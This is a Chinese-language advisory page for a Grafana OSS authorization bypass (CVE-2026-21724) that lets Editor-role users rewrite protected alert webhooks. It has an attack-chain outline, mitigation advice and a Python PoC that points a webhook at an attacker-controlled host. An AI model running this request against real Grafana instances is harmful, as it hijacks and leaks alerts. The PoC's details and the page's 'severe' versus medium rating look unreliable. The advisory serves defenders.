CVE-2026-21724 CVSS 5.4 中危

CVE-2026-21724 Grafana OSS 授权绕过漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-21724

漏洞类型

权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Grafana OSS

漏洞概述

Grafana OSS 中发现一处严重的授权绕过漏洞，主要影响其配置联系点 API 接口。该漏洞允许仅拥有 Editor 角色的用户在未具备 alert.notifications.receivers.protected:write 权限的情况下，成功修改受保护的 webhook URL。此缺陷可能导致低权限用户恶意篡改系统关键通知配置，破坏系统完整性并引发严重的安全事件。

技术细节

该漏洞源于 Grafana OSS 在处理配置联系点 API 请求时，缺乏对特定敏感操作的严格权限校验机制。在正常的权限架构中，修改受保护的 webhook URL 被视为高风险操作，要求用户必须具备 alert.notifications.receivers.protected:write 权限。然而，由于代码逻辑缺陷，系统未能正确拦截低权限用户的写请求。具体而言，当攻击者获取到 Editor 角色的账号凭证后，可利用该漏洞直接调用 provisioning 接口。系统在处理该请求时，错误地跳过了对受保护资源的权限检查，导致未授权的修改操作得以执行。攻击者可借此篡改告警通知地址，将原本发送给管理员的敏感告警重定向至恶意服务器，造成信息泄露或运维误导，严重威胁系统的完整性与机密性。

攻击链分析

STEP 1

信息收集

攻击者识别目标 Grafana 实例，并获取一个具有 Editor 角色的低权限账号凭证。

STEP 2

漏洞利用

攻击者构造特定的 API 请求，向 provisioning contact points 接口发送包含恶意 webhook URL 的数据包。

STEP 3

权限绕过

系统处理请求时，因逻辑缺陷未检查 alert.notifications.receivers.protected:write 权限，直接允许修改操作。

STEP 4

达成影响

受保护的 webhook URL 被篡改为攻击者控制的地址，后续告警信息将被劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target-grafana/api/provisioning/contact-points"

# Payload to modify a protected webhook
# The vulnerability allows 'Editor' role to perform this action
payload = {
    "name": "Webhook-Modified",
    "type": "webhook",
    "settings": {
        "url": "http://attacker-controlled-server/webhook",
        "http_method": "POST"
    },
    "isDefault": False,
    "provenance": "api" # Bypassing permission checks via provisioning API
}

headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <Editor_Role_Token>" # Token with Editor role only
}

# Send the request to exploit the vulnerability
try:
    response = requests.put(target_url, json=payload, headers=headers)

    if response.status_code == 202 or response.status_code == 200:
        print("[+] PoC Successful: Protected webhook URL modified without elevated permissions.")
    else:
        print(f"[-] PoC Failed: Status Code {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Grafana OSS (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议立即限制 Grafana 实例的网络访问，仅允许可信 IP 地址访问管理接口。同时，应全面审计系统中的告警通知配置，验证所有 webhook URL 的合法性。在官方补丁发布并应用前，可考虑暂时移除非必要用户的 Editor 权限，以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表